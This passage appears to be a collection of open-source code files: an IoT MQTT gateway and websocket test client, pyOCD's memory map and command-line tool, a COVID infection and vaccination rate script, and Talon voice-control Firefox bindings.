.format(self.nodes)) for _, value in self.nodes.items(): self._on_message_cb(Msg.new_node(value['uid'], dst=source)) for resource, data in value['data'].items(): self._on_message_cb( Msg.update_node(value['uid'], resource, data, dst=source)) def send_data_to_node(self, data): """Forward received message data to the destination node. The message should be JSON and contain 'uid', 'path' and 'payload' keys. 
- 'uid' corresponds to the node uid (uuid) - 'path' corresponds to the MQTT resource the node has subscribed to. - 'payload' corresponds to the new payload for the MQTT resource. """ uid = data['uid'] endpoint = data['endpoint'] payload = data['payload'] logger.debug("Translating message ('{}') received to MQTT publish " "request".format(data)) for node, value in self.nodes.items(): if self.nodes[node]['uid'] == uid: node_id = node.node_id logger.debug("Updating MQTT node '{}' resource '{}'" .format(node_id, endpoint)) asyncio.get_event_loop().create_task(self.mqtt_client.publish( 'gateway/{}/{}/set'.format(node_id, endpoint), payload.encode(), qos=QOS_1)) break def check_dead_nodes(self): """Check and remove nodes that are not alive anymore.""" to_remove = [node for node in self.nodes.keys() if int(time.time()) > node.check_time + self.max_time] for node in to_remove: asyncio.get_event_loop().create_task( self._disconnect_from_node(node)) for resource in node.resources: pass uid = self.nodes[node]['uid'] self.nodes.pop(node) logger.debug("Removing inactive node {}".format(uid)) logger.debug("Available nodes {}".format(self.nodes)) self._on_message_cb(Msg.out_node(uid)) @asyncio.coroutine def _disconnect_from_node(self, node): yield from self.mqtt_client.unsubscribe( ['node/{}/resource'.format(node.node_id)]) for resource in node.resources: yield from self.mqtt_client.unsubscribe( ['node/{}/{}'.format(node.node_id, resource)]) ``` #### File: utils/ws/ws_test_client.py ```python import sys import argparse import json import websocket from pyaiot.common.messaging import Message def init_node(ws): """Send initial node information""" ws.send(json.dumps({'type': 'update', 'data': {'node': 'fd00:aaaa:bbbb::1', 'name': 'websocket', 'led': '0', 'os': 'riot'}})) def main(args): """Main function.""" try: ws = websocket.create_connection("ws://{}:{}/node".format(args.host, args.port)) except ConnectionRefusedError: print("Cannot connect to ws://{}:{}".format(args.host, args.port)) return init_node(ws) while True: try: msg = ws.recv() except: print("Connection closed") break else: print(msg) if msg == Message.discover_node(): init_node(ws) else: msg = json.loads(msg) if msg['payload'] == '1': ws.send(json.dumps({'type': 'update', 'data': {'led': '1'}})) else: ws.send(json.dumps({'type': 'update', 'data': {'led': '0'}})) if __name__ == '__main__': parser = argparse.ArgumentParser(description="Test Websocket node") parser.add_argument('--host', type=str, default="localhost", help="Gateway host.") parser.add_argument('--port', type=str, default="8001", help="CoGateway port") args = parser.parse_args() try: main(args) except KeyboardInterrupt: print("Exiting") sys.exit() ```
{ "source": "aabadie/pyOCD", "score": 2 }
#### File: pyocd/core/memory_map.py ```python from enum import Enum import six from functools import total_ordering class MemoryType(Enum): """! @brief Known types of memory.""" OTHER = 0 RAM = 1 ROM = 2 FLASH = 3 DEVICE = 4 EXTERNAL = 5 def check_range(start, end=None, length=None, range=None): assert (start is not None) and ((isinstance(start, MemoryRange) or range is not None) or ((end is not None) ^ (length is not None))) if isinstance(start, MemoryRange): range = start if range is not None: start = range.start end = range.end elif end is None: end = start + length - 1 return start, end ## @brief A range of memory within a region. @total_ordering class MemoryRangeBase(object): def __init__(self, start=0, end=0, length=0, region=None): self._start = start if length != 0: self._end = self._start + length - 1 else: self._end = end self._region = region @property def start(self): return self._start @property def end(self): return self._end @property def length(self): return self._end - self._start + 1 @property def region(self): return self._region def contains_address(self, address): return (address >= self.start) and (address <= self.end) ## # @return Whether the given range is fully contained by the region. def contains_range(self, start, end=None, length=None, range=None): start, end = check_range(start, end, length, range) return self.contains_address(start) and self.contains_address(end) ## # @return Whether the region is fully within the bounds of the given range. def contained_by_range(self, start, end=None, length=None, range=None): start, end = check_range(start, end, length, range) return start <= self.start and end >= self.end ## # @return Whether the region and the given range intersect at any point. def intersects_range(self, start, end=None, length=None, range=None): start, end = check_range(start, end, length, range) return (start <= self.start and end >= self.start) or (start <= self.end and end >= self.end) \ or (start >= self.start and end <= self.end) def __hash__(self): h = hash("%08x%08x%08x" % (self.start, self.end, self.length)) if self.region is not None: h ^= hash(self.region) return h def __eq__(self, other): return self.start == other.start and self.length == other.length def __lt__(self, other): return self.start < other.start or (self.start == other.start and self.length == other.length) ## @brief A range of memory within a region. class MemoryRange(MemoryRangeBase): def __init__(self, start=0, end=0, length=0, region=None): super(MemoryRange, self).__init__(start=start, end=end, length=length) self._region = region @property def region(self): return self._region def __repr__(self): return "<%s@0x%x start=0x%x end=0x%x length=0x%x region=%s>" % (self.__class__.__name__, id(self), self.start, self.end, self.length, self.region) ## @brief One contiguous range of memory. class MemoryRegion(MemoryRangeBase): DEFAULT_ATTRS = { 'name': lambda r: r.attributes.get('name', r.type.name.lower()), 'access': 'rwx', 'alias': None, 'blocksize': 0, 'is_boot_memory': False, 'is_powered_on_boot': True, 'is_cacheable': True, 'invalidate_cache_on_run': True, 'is_testable': True, 'is_ram': lambda r: r.type == MemoryType.RAM, 'is_rom': lambda r: r.type == MemoryType.ROM, 'is_flash': lambda r: r.type == MemoryType.FLASH, 'is_device': lambda r: r.type == MemoryType.DEVICE, 'is_external': lambda r: r.type == MemoryType.EXTERNAL, } def __init__(self, type=MemoryType.OTHER, start=0, end=0, length=0, **attrs): """! Memory region constructor. 
Optional region attributes passed as keyword arguments: - name: If a name is not provided, the name is set to the region type in lowercase. - access: composition of r, w, x, s - alias - blocksize - is_boot_memory - is_powered_on_boot - is_cacheable - invalidate_cache_on_run - is_testable """ super(MemoryRegion, self).__init__(start=start, end=end, length=length) assert isinstance(type, MemoryType) self._map = None self._type = type self._attributes = attrs # Assign default values to any attributes missing from kw args. for k, v in self.DEFAULT_ATTRS.items(): if k not in self._attributes: if callable(v): v = v(self) self._attributes[k] = v @property def map(self): return self._map @map.setter def map(self, theMap): self._map = theMap @property def type(self): return self._type @property def attributes(self): return self._attributes @property def alias(self): # Resolve alias reference. aliasValue = self._attributes['alias'] if isinstance(aliasValue, six.string_types): referent = self._map.get_region_by_name(aliasValue) if referent is None: raise ValueError("unable to resolve memory region alias reference '%s'" % aliasValue) self._attributes['alias'] = referent return referent else: return aliasValue @property def is_readable(self): return 'r' in self.access @property def is_writable(self): return 'w' in self.access @property def is_executable(self): return 'x' in self.access @property def is_secure(self): return 's' in self.access def __getattr__(self, name): return self._attributes[name] def __repr__(self): return "<%s@0x%x name=%s type=%s start=0x%x end=0x%x length=0x%x blocksize=0x%x>" % (self.__class__.__name__, id(self), self.name, self.type, self.start, self.end, self.length, self.blocksize) ## @brief Contiguous region of RAM. class RamRegion(MemoryRegion): def __init__(self, start=0, end=0, length=0, **attrs): super(RamRegion, self).__init__(type=MemoryType.RAM, start=start, end=end, length=length, **attrs) ## @brief Contiguous region of ROM. class RomRegion(MemoryRegion): def __init__(self, start=0, end=0, length=0, **attrs): attrs['access'] = attrs.get('access', 'rx') super(RomRegion, self).__init__(type=MemoryType.ROM, start=start, end=end, length=length, **attrs) ## @brief Contiguous region of flash memory. class FlashRegion(MemoryRegion): def __init__(self, start=0, end=0, length=0, **attrs): # Import locally to prevent import loops. from ..flash.flash import Flash attrs['access'] = attrs.get('access', 'rx') # By default flash is not writable. super(FlashRegion, self).__init__(type=MemoryType.FLASH, start=start, end=end, length=length, **attrs) self._algo = attrs.get('algo', None) self._flash = None if 'flash_class' in attrs: self._flash_class = attrs['flash_class'] assert issubclass(self._flash_class, Flash) else: self._flash_class = Flash @property def flash_algo(self): return self._algo @property def flash_class(self): return self._flash_class @property def flash(self): return self._flash @flash.setter def flash(self, flashInstance): self._flash = flashInstance ## @brief Contiguous region of external memory. class ExternalRegion(MemoryRegion): def __init__(self, start=0, end=0, length=0, **attrs): attrs['is_testable'] = False super(ExternalRegion, self).__init__(type=MemoryType.EXTERNAL, start=start, end=end, length=length, **attrs) ## @brief Device or peripheral memory. class DeviceRegion(MemoryRegion): def __init__(self, start=0, end=0, length=0, **attrs): attrs['access'] = attrs.get('access', 'rw') # By default flash is not executable. 
attrs['is_cacheable'] = False attrs['is_testable'] = False super(DeviceRegion, self).__init__(type=MemoryType.DEVICE, start=start, end=end, length=length, **attrs) ## @brief Memory map consisting of memory regions. class MemoryMap(object): def __init__(self, *moreRegions): self._regions = [] self.add_regions(*moreRegions) @property def regions(self): return self._regions @property def region_count(self): return len(self._regions) def add_regions(self, *moreRegions): if len(moreRegions): if isinstance(moreRegions[0], (list, tuple)): regionsToAdd = moreRegions[0] else: regionsToAdd = moreRegions for newRegion in regionsToAdd: self.add_region(newRegion) def add_region(self, newRegion): newRegion.map = self self._regions.append(newRegion) self._regions.sort() def get_boot_memory(self): for r in self._regions: if r.is_boot_memory: return r return None def get_region_for_address(self, address): for r in self._regions: if r.contains_address(address): return r return None def get_region_by_name(self, name): for r in self._regions: if r.name == name: return r return None def is_valid_address(self, address): return self.get_region_for_address(address) is not None def get_contained_regions(self, start, end=None, length=None, range=None): start, end = check_range(start, end, length, range) return [r for r in self._regions if r.contained_by_range(start, end)] def get_intersecting_regions(self, start, end=None, length=None, range=None): start, end = check_range(start, end, length, range) return [r for r in self._regions if r.intersects_range(start, end)] def get_regions_of_type(self, type): for r in self._regions: if r.type == type: yield r def get_first_region_of_type(self, type): for r in self.get_regions_of_type(type): return r return None ## @brief Enable iteration over the memory map. def __iter__(self): return iter(self._regions) def __repr__(self): return "<MemoryMap@0x%08x regions=%s>" % (id(self), repr(self._regions)) ``` #### File: pyOCD/pyocd/__main__.py ```python from __future__ import print_function import sys import logging import traceback import argparse import json import colorama from . import __version__ from .core.helpers import ConnectHelper from .target import TARGET from .gdbserver import GDBServer from .utility.cmdline import ( split_command_line, VECTOR_CATCH_CHAR_MAP, convert_vector_catch, convert_session_options ) from .probe.pydapaccess import DAPAccess from .tools.lists import ListGenerator from .tools.pyocd import PyOCDCommander from .flash import loader from .core import options from .utility.cmdline import split_command_line ## @brief List of built-in targets, sorted by name. SUPPORTED_TARGETS = sorted(list(TARGET.keys())) ## @brief Default log format for all subcommands. LOG_FORMAT = "%(relativeCreated)07d:%(levelname)s:%(module)s:%(message)s" ## @brief Logger for this module. LOG = logging.getLogger("pyocd.tool") ## @brief Default log levels for each of the subcommands. DEFAULT_CMD_LOG_LEVEL = { 'list': logging.INFO, 'json': logging.FATAL + 1, 'flash': logging.WARNING, 'erase': logging.WARNING, 'gdbserver': logging.INFO, 'gdb': logging.INFO, 'commander': logging.WARNING, 'cmd': logging.WARNING, } ## @brief map to convert erase mode to chip_erase option for gdbserver. ERASE_OPTIONS = { 'auto': None, 'chip': True, 'sector': False, } class InvalidArgumentError(RuntimeError): """! @brief Exception class raised for invalid target names.""" pass def validate_target(value): """! @brief Argparse type function to validate the supplied target device name. 
If the target name is valid, it is returned unmodified to become the --target option's attribute value. """ if value.lower() not in TARGET: raise InvalidArgumentError("invalid target option '{}'".format(value)) return value def convert_frequency(value): """! @brief Applies scale suffix to frequency value string.""" value = value.strip() suffix = value[-1].lower() if suffix in ('k', 'm'): value = int(value[:-1]) if suffix == 'k': value *= 1000 elif suffix == 'm': value *= 1000000 return value else: return int(value) def flatten_args(args): """! @brief Converts a list of lists to a single list.""" return [item for sublist in args for item in sublist] def int_base_0(x): return int(x, base=0) class PyOCDTool(object): """! @brief Main class for the pyocd tool and subcommands. """ def __init__(self): self._args = None self._log_level_delta = 0 self._parser = None self.echo_msg = None self._commands = { 'list': self.do_list, 'json': self.do_json, 'flash': self.do_flash, 'erase': self.do_erase, 'gdbserver': self.do_gdbserver, 'gdb': self.do_gdbserver, 'commander': self.do_commander, 'cmd': self.do_commander, } def build_parser(self): # Create top level argument parser. parser = argparse.ArgumentParser( description='PyOCD debug tools for Arm Cortex devices') subparsers = parser.add_subparsers(title="subcommands", metavar="", dest='cmd') parser.add_argument('-V', '--version', action='version', version=__version__) parser.add_argument('--help-options', action='store_true', help="Display available session options.") # Define common options for all subcommands, excluding --verbose and --quiet. commonOptionsNoLogging = argparse.ArgumentParser(description='common', add_help=False) commonOptionsNoLogging.add_argument('--config', metavar="PATH", help="Specify YAML configuration file. Default is pyocd.yaml or pyocd.yml.") commonOptionsNoLogging.add_argument("--no-config", action="store_true", help="Do not use a configuration file.") commonOptionsNoLogging.add_argument('-O', action='append', dest='options', metavar="OPTION=VALUE", help="Set named option.") commonOptionsNoLogging.add_argument("-da", "--daparg", dest="daparg", nargs='+', help="Send setting to DAPAccess layer.") # Define common options for all subcommands with --verbose and --quiet. commonOptions = argparse.ArgumentParser(description='common', parents=[commonOptionsNoLogging], add_help=False) commonOptions.add_argument('-v', '--verbose', action='count', default=0, help="More logging. Can be specified multiple times.") commonOptions.add_argument('-q', '--quiet', action='count', default=0, help="Less logging. Can be specified multiple times.") # Common connection related options. connectOptions = argparse.ArgumentParser(description='common', add_help=False) connectOptions.add_argument("-u", "--uid", dest="unique_id", help="Choose a probe by its unique ID or a substring thereof.") connectOptions.add_argument("-b", "--board", dest="board_override", metavar="BOARD", help="Set the board type (not yet implemented).") connectOptions.add_argument("-t", "--target", dest="target_override", metavar="TARGET", type=validate_target, help="Set the target type.") connectOptions.add_argument("-f", "--frequency", dest="frequency", default=1000000, type=convert_frequency, help="SWD/JTAG clock frequency in Hz, with optional k/K or m/M suffix for kHz or MHz.") connectOptions.add_argument("-W", "--no-wait", action="store_true", help="Do not wait for a probe to be connected if none are available.") # Create *commander* subcommand parser. 
commandOptions = argparse.ArgumentParser(description='command', add_help=False) commandOptions.add_argument("-H", "--halt", action="store_true", help="Halt core upon connect.") commandOptions.add_argument("-N", "--no-init", action="store_true", help="Do not init debug system.") commandOptions.add_argument("--elf", metavar="PATH", help="Optionally specify ELF file being debugged.") commandOptions.add_argument("-c", "--command", dest="commands", metavar="CMD", action='append', nargs='+', help="Run commands.") subparsers.add_parser('commander', parents=[commonOptions, connectOptions, commandOptions], help="Interactive command console.") subparsers.add_parser('cmd', parents=[commonOptions, connectOptions, commandOptions], help="Alias for 'commander'.") # Create *erase* subcommand parser. eraseParser = subparsers.add_parser('erase', parents=[commonOptions, connectOptions], help="Erase entire device flash or specified sectors.", epilog="If no position arguments are listed, then no action will be taken unless the --chip or " "--mass-erase options are provided. Otherwise, the positional arguments should be the addresses of flash " "sectors or address ranges. The end address of a range is exclusive, meaning that it will not be " "erased. Thus, you should specify the address of the sector after the last one " "to be erased. If a '+' is used instead of '-' in a range, this indicates that the " "second value is a length rather than end address. " "Examples: 0x1000 (erase single sector starting at 0x1000) " "0x800-0x2000 (erase sectors starting at 0x800 up to but not including 0x2000) " "0+8192 (erase 8 kB starting at address 0)") eraseParser.add_argument("-c", "--chip", dest="erase_mode", action="store_const", const=loader.FlashEraser.Mode.CHIP, help="Perform a chip erase.") eraseParser.add_argument("-s", "--sector", dest="erase_mode", action="store_const", const=loader.FlashEraser.Mode.SECTOR, help="Erase the sectors listed as positional arguments.") eraseParser.add_argument("--mass-erase", dest="erase_mode", action="store_const", const=loader.FlashEraser.Mode.MASS, help="Perform a mass erase. On some devices this is different than a chip erase.") eraseParser.add_argument("addresses", metavar="<sector-address>", action='append', nargs='*', help="List of sector addresses or ranges to erase.") # Create *flash* subcommand parser. flashParser = subparsers.add_parser('flash', parents=[commonOptions, connectOptions], help="Program an image to device flash.") flashParser.add_argument("-e", "--erase", choices=ERASE_OPTIONS.keys(), default='auto', help="Choose flash erase method. Default is auto.") flashParser.add_argument("-a", "--base-address", metavar="ADDR", type=int_base_0, help="Base address used for the address where to flash a binary. Defaults to start of flash.") flashParser.add_argument("--trust-crc", action="store_true", help="Use only the CRC of each page to determine if it already has the same data.") flashParser.add_argument("--format", choices=("bin", "hex", "elf"), help="File format. Default is to use the file's extension.") flashParser.add_argument("--skip", metavar="BYTES", default=0, type=int_base_0, help="Skip programming the first N bytes. This can only be used with binary files.") flashParser.add_argument("file", metavar="PATH", help="File to program into flash.") # Create *gdbserver* subcommand parser. 
gdbserverOptions = argparse.ArgumentParser(description='gdbserver', add_help=False) gdbserverOptions.add_argument("-p", "--port", dest="port_number", type=int, default=3333, help="Set the port number that GDB server will open (default 3333).") gdbserverOptions.add_argument("-T", "--telnet-port", dest="telnet_port", type=int, default=4444, help="Specify the telnet port for semihosting (default 4444).") gdbserverOptions.add_argument("--allow-remote", dest="serve_local_only", default=True, action="store_false", help="Allow remote TCP/IP connections (default is no).") gdbserverOptions.add_argument("--persist", dest="persist", default=False, action="store_true", help="Keep GDB server running even after remote has detached.") gdbserverOptions.add_argument("--elf", metavar="PATH", help="Optionally specify ELF file being debugged.") gdbserverOptions.add_argument("-e", "--erase", choices=('auto', 'chip', 'sector'), default='auto', help="Choose flash erase method. Default is auto.") gdbserverOptions.add_argument("--trust-crc", action="store_true", help="Use only the CRC of each page to determine if it already has the same data.") gdbserverOptions.add_argument("-C", "--vector-catch", default='h', help="Enable vector catch sources, one letter per enabled source in any order, or 'all' " "or 'none'. (h=hard fault, b=bus fault, m=mem fault, i=irq err, s=state err, " "c=check err, p=nocp, r=reset, a=all, n=none). Default is hard fault.") gdbserverOptions.add_argument("-S", "--semihosting", dest="enable_semihosting", action="store_true", help="Enable semihosting.") gdbserverOptions.add_argument("--step-into-interrupts", dest="step_into_interrupt", default=False, action="store_true", help="Allow single stepping to step into interrupts.") gdbserverOptions.add_argument("-c", "--command", dest="commands", metavar="CMD", action='append', nargs='+', help="Run command (OpenOCD compatibility).") subparsers.add_parser('gdbserver', parents=[commonOptions, connectOptions, gdbserverOptions], help="Run the gdb remote server(s).") subparsers.add_parser('gdb', parents=[commonOptions, connectOptions, gdbserverOptions], help="Alias for 'gdbserver'.") # Create *json* subcommand parser. # # The json subcommand does not support --verbose or --quiet since all logging is disabled. jsonParser = subparsers.add_parser('json', parents=[commonOptionsNoLogging], help="Output information as JSON.") group = jsonParser.add_mutually_exclusive_group() group.add_argument('-p', '--probes', action='store_true', help="List available probes.") group.add_argument('-t', '--targets', action='store_true', help="List all known targets.") group.add_argument('-b', '--boards', action='store_true', help="List all known boards.") jsonParser.set_defaults(verbose=0, quiet=0) # Create *list* subcommand parser. 
listParser = subparsers.add_parser('list', parents=[commonOptions], help="List information about probes, targets, or boards.") group = listParser.add_mutually_exclusive_group() group.add_argument('-p', '--probes', action='store_true', help="List available probes.") group.add_argument('-t', '--targets', action='store_true', help="List all known targets.") group.add_argument('-b', '--boards', action='store_true', help="List all known boards.") self._parser = parser return parser def _setup_logging(self, defaultLogLevel): self._log_level_delta = (self._args.quiet * 10) - (self._args.verbose * 10) level = max(1, defaultLogLevel + self._log_level_delta) logging.basicConfig(level=level, format=LOG_FORMAT) def _increase_logging(self, loggers): if self._log_level_delta <= 0: for logger in loggers: logging.getLogger(logger).setLevel(logging.INFO) def run(self, args=None): try: self._args = self.build_parser().parse_args(args) # Running without a subcommand will print usage. if self._args.cmd is None: if self._args.help_options: self.show_options_help() else: self._parser.print_help() return 1 # The default log level differs for some subcommands. defaultLogLevel = DEFAULT_CMD_LOG_LEVEL[self._args.cmd] self._setup_logging(defaultLogLevel) # Pass any options to DAPAccess. DAPAccess.set_args(self._args.daparg) # Invoke subcommand. self._commands[self._args.cmd]() # Successful exit. return 0 except InvalidArgumentError as e: self._parser.error(e) return 1 except KeyboardInterrupt: return 0 except Exception as e: LOG.error("uncaught exception: %s", e, exc_info=True) return 1 def show_options_help(self): for infoName in sorted(options.OPTIONS_INFO.keys()): info = options.OPTIONS_INFO[infoName] print((colorama.Fore.BLUE + "{name}" + colorama.Style.RESET_ALL + colorama.Fore.GREEN + " ({typename})" + colorama.Style.RESET_ALL + " {help}").format( name=info.name, typename=info.type.__name__, help=info.help)) def do_list(self): # Default to listing probes. if (self._args.probes, self._args.targets, self._args.boards) == (False, False, False): self._args.probes = True if self._args.probes: ConnectHelper.list_connected_probes() elif self._args.targets: obj = ListGenerator.list_targets() for info in obj['targets']: print("{name}\t{part_number}".format(**info)) elif self._args.boards: obj = ListGenerator.list_boards() for info in obj['boards']: print("{id}\t{name}\t{target}\t{binary}".format(**info)) def do_json(self): # Default to listing probes. 
if (self._args.probes, self._args.targets, self._args.boards) == (False, False, False): self._args.probes = True if self._args.probes: obj = ListGenerator.list_probes() print(json.dumps(obj, indent=4)) elif self._args.targets: obj = ListGenerator.list_targets() print(json.dumps(obj, indent=4)) elif self._args.boards: obj = ListGenerator.list_boards() print(json.dumps(obj, indent=4)) def do_flash(self): self._increase_logging(["pyocd.tools.loader", "pyocd", "flash", "flash_builder"]) session = ConnectHelper.session_with_chosen_probe( config_file=self._args.config, no_config=self._args.no_config, unique_id=self._args.unique_id, target_override=self._args.target_override, frequency=self._args.frequency, blocking=False, **convert_session_options(self._args.options)) if session is None: sys.exit(1) with session: programmer = loader.FileProgrammer(session, chip_erase=ERASE_OPTIONS[self._args.erase], trust_crc=self._args.trust_crc) programmer.program(self._args.file, base_address=self._args.base_address, skip=self._args.skip, format=self._args.format) def do_erase(self): self._increase_logging(["pyocd.tools.loader", "pyocd"]) session = ConnectHelper.session_with_chosen_probe( config_file=self._args.config, no_config=self._args.no_config, unique_id=self._args.unique_id, target_override=self._args.target_override, frequency=self._args.frequency, blocking=False, **convert_session_options(self._args.options)) if session is None: sys.exit(1) with session: mode = self._args.erase_mode or loader.FlashEraser.Mode.SECTOR eraser = loader.FlashEraser(session, mode) addresses = flatten_args(self._args.addresses) eraser.erase(addresses) ## @brief Handle OpenOCD commands for compatibility. def _process_commands(self, commands): if commands is None: return for cmd_list in commands: try: cmd_list = split_command_line(cmd_list) cmd = cmd_list[0] if cmd == 'gdb_port': if len(cmd_list) < 2: LOG.error("Missing port argument") else: self._args.port_number = int(cmd_list[1], base=0) elif cmd == 'telnet_port': if len(cmd_list) < 2: LOG.error("Missing port argument") else: self._args.telnet_port = int(cmd_list[1], base=0) elif cmd == 'echo': self.echo_msg = ' '.join(cmd_list[1:]) else: LOG.error("Unsupported command: %s" % ' '.join(cmd_list)) except IndexError: pass def server_listening(self, server): if self.echo_msg is not None: print(self.echo_msg, file=sys.stderr) sys.stderr.flush() def do_gdbserver(self): self._process_commands(self._args.commands) gdbs = [] try: # Build dict of session options. sessionOptions = convert_session_options(self._args.options) sessionOptions.update({ 'gdbserver_port' : self._args.port_number, 'telnet_port' : self._args.telnet_port, 'persist' : self._args.persist, 'step_into_interrupt' : self._args.step_into_interrupt, 'chip_erase': ERASE_OPTIONS[self._args.erase], 'fast_program' : self._args.trust_crc, 'enable_semihosting' : self._args.enable_semihosting, 'serve_local_only' : self._args.serve_local_only, 'vector_catch' : self._args.vector_catch, }) session = ConnectHelper.session_with_chosen_probe( blocking=(not self._args.no_wait), config_file=self._args.config, no_config=self._args.no_config, unique_id=self._args.unique_id, target_override=self._args.target_override, frequency=self._args.frequency, **sessionOptions) if session is None: LOG.error("No probe selected.") return with session: # Set ELF if provided. 
if self._args.elf: session.board.target.elf = self._args.elf for core_number, core in session.board.target.cores.items(): gdb = GDBServer(session, core=core_number, server_listening_callback=self.server_listening) gdbs.append(gdb) gdb = gdbs[0] while gdb.isAlive(): gdb.join(timeout=0.5) except Exception as e: for gdb in gdbs: gdb.stop() raise def do_commander(self): # Flatten commands list then extract primary command and its arguments. if self._args.commands is not None: cmds = [] for cmd in self._args.commands: cmds.append(flatten_args(split_command_line(arg) for arg in cmd)) else: cmds = None # Enter REPL. PyOCDCommander(self._args, cmds).run() def main(): sys.exit(PyOCDTool().run()) if __name__ == '__main__': main() ```
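Besides the installed console script, the dispatcher above can be driven programmatically: `PyOCDTool.run()` accepts the same argument list the shell would pass. A minimal sketch, assuming this version of pyocd is importable; the actual output depends on which probes are attached.

```python
from pyocd.__main__ import PyOCDTool

# Equivalent to `pyocd list --targets`: prints the table of built-in target types.
exit_code = PyOCDTool().run(["list", "--targets"])

# Equivalent to `pyocd json --probes`: prints connected-probe info as JSON
# (logging is suppressed for the json subcommand, as set up above).
exit_code = PyOCDTool().run(["json", "--probes"])
```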
{ "source": "aabadie/riotctrl", "score": 3 }
#### File: utils/application/hello.py
```python
import sys
import signal


def main():
    """Print a startup banner, then block indefinitely waiting for signals."""
    print('Starting RIOT Ctrl')
    print('Hello World')
    while True:
        signal.pause()


if __name__ == '__main__':
    sys.exit(main())
```
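A minimal way a test harness might exercise this dummy application, using only the standard library. The relative script path is an assumption, and `-u` keeps the child's stdout unbuffered so the banner can be read before the process is terminated.

```python
import subprocess
import sys

# Spawn the dummy application above and check its startup banner.
proc = subprocess.Popen(
    [sys.executable, "-u", "utils/application/hello.py"],
    stdout=subprocess.PIPE,
    text=True,
)
try:
    assert proc.stdout.readline().strip() == "Starting RIOT Ctrl"
    assert proc.stdout.readline().strip() == "Hello World"
finally:
    proc.terminate()
    proc.wait()
```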
{ "source": "aabaker/covid-data", "score": 3 }
#### File: aabaker/covid-data/world-rates.py ```python import codecs import csv import datetime from contextlib import closing import requests url = 'https://covid.ourworldindata.org/data/owid-covid-data.csv' cont_col = 1 name_col = 2 date_col = 3 newc_col = 5 vacc_col = 34 popn_col = 44 jan1 = datetime.date(2020, 1, 1) class Country: def __init__(self, name, population): self.population = population self.name = name self.vaccinations = 0 self.cases = [] self.vaccinationDate = 0 def addCases(self, daynum, num, vaccinations): while (len(self.cases) <= daynum): self.cases.append(0) if vaccinations > self.vaccinations: self.vaccinations = vaccinations self.vaccinationDate = daynum self.cases[daynum] = num def totalCases(self): return sum(self.cases) def days(self): return len(self.cases) def rateOverInterval(self, end, days): return sum(self.cases[end - days + 1:end + 1]) / self.population * 100000 def format(self, day): result = self.name result += ', This Week: ' result += f'{self.rateOverInterval(day, 7):.2f}' result += ', Last Week: ' result += f'{self.rateOverInterval(day - 7, 7):.2f}' result += ', Total: ' result += f'{self.rateOverInterval(day, day):.2f}' result += ', Population: ' result += f'{self.population:.0f}' result += ', Ref Day: ' result += str(jan1 + datetime.timedelta(day)) return result countries = {} latestDay = 0 with closing(requests.get(url, stream=True)) as r: reader = csv.reader(codecs.iterdecode(r.iter_lines(), 'utf-8')) head = next(reader) # skip header for row in reader: country = row[name_col] if row[cont_col] == "": continue if not country in countries: try: countries[country] = Country(country, float(row[popn_col])) except: print(country) row_date = datetime.datetime.strptime(row[date_col], '%Y-%m-%d').date() if row[vacc_col] == "": vaccinations = 0.0 else: vaccinations = float(row[vacc_col]) if row_date >= jan1: if (row_date - jan1).days > latestDay: latestDay = (row_date - jan1).days cases = row[newc_col] if cases == '': cases = 0 else: cases = int(float(cases)) if cases != 0: countries[country].addCases((row_date - jan1).days, cases, vaccinations) print("Infection rates") sortedCountries = sorted(countries, key=lambda place: countries[place].rateOverInterval(countries[place].days() - 1,7), reverse=True) index = 0 printed = 0 while printed < 15: place = sortedCountries[index] if countries[place].days() > latestDay - 7: printed += 1 print(countries[place].format(countries[place].days() - 1)) index += 1 print() print(countries["United Kingdom"].format(countries[place].days() - 1)) print(countries["France"].format(countries[place].days() - 1)) print(countries["Italy"].format(countries[place].days() - 1)) print(countries["Germany"].format(countries[place].days() - 1)) print() print("Vaccination rates") sortedCountries = sorted(countries, key=lambda place: countries[place].vaccinations / countries[place].population, reverse=True) for place in sortedCountries[:15]: print(countries[place].name + " percent vaccinated: " + f'{countries[place].vaccinations / countries[place].population * 100.0 :.2f}' + " total vaccinations: " + str (countries[place].vaccinations) + ' as of : ' + str(jan1 + datetime.timedelta(countries[place].vaccinationDate))) ```
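The reporting in `Country.format` hinges on `rateOverInterval`, which scales a window of daily case counts to cases per 100,000 inhabitants. A self-contained illustration of that arithmetic, with invented figures:

```python
# Worked example of the rate arithmetic used in Country.rateOverInterval above:
# sum the new cases over a window, then scale to cases per 100,000 inhabitants.
# The numbers below are made up purely for illustration.
daily_cases = [120, 90, 150, 200, 180, 160, 140, 210, 230, 190, 250, 220, 240, 260]
population = 1_500_000  # hypothetical country

this_week = sum(daily_cases[-7:]) / population * 100000
last_week = sum(daily_cases[-14:-7]) / population * 100000

print(f"This Week: {this_week:.2f}, Last Week: {last_week:.2f}")
```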
{ "source": "aabarug/knausj_talon", "score": 3 }
#### File: apps/firefox/mac.py ```python from talon import Context, actions ctx = Context() ctx.matches = r""" os: mac app: firefox """ @ctx.action_class('browser') class BrowserActions: def bookmark(): actions.key('cmd-d') def bookmark_tabs(): actions.key('cmd-shift-d') def bookmarks(): actions.key('cmd-alt-b') #action(browser.bookmarks_bar): # key(ctrl-shift-b) def focus_address(): actions.key('cmd-l') #action(browser.focus_page): def go_blank(): actions.key('cmd-n') def go_back(): actions.key('cmd-left') def go_forward(): actions.key('cmd-right') def go_home(): actions.key('cmd-shift-h') def open_private_window(): actions.key('cmd-shift-p') def reload(): actions.key('cmd-r') def reload_hard(): actions.key('cmd-shift-r') #action(browser.reload_hardest): def show_clear_cache(): actions.key('cmd-shift-delete') def show_downloads(): actions.key('cmd-shift-j') def show_extensions(): actions.key('cmd-shift-a') def show_history(): actions.key('cmd-y') def toggle_dev_tools(): actions.key('cmd-alt-i') @ctx.action_class("user") class UserActions: def tab_jump(number: int): if number < 9: actions.key("cmd-{}".format(number)) def tab_final(): actions.key("cmd-9") ``` #### File: knausj_talon/talon_draft_window/draft_ui.py ```python from typing import Optional import re from talon.experimental.textarea import ( TextArea, Span, DarkThemeLabels, LightThemeLabels ) word_matcher = re.compile(r"([^\s]+)(\s*)") def calculate_text_anchors(text, cursor_position, anchor_labels=None): """ Produces an iterator of (anchor, start_word_index, end_word_index, last_space_index) tuples from the given text. Each tuple indicates a particular point you may want to reference when editing along with some useful ranges you may want to operate on. - text is the text you want to process. - cursor_position is the current position of the cursor, anchors will be placed around this. - anchor_labels is a list of characters you want to use for your labels. - *index is just a character offset from the start of the string (e.g. the first character is at index 0) - end_word_index is the index of the character after the last one included in the anchor. That is, you can use it with a slice directly like [start:end] - anchor is a short piece of text you can use to identify it (e.g. 'a', or '1'). """ anchor_labels = anchor_labels or "abcdefghijklmnopqrstuvwxyz" if len(text) == 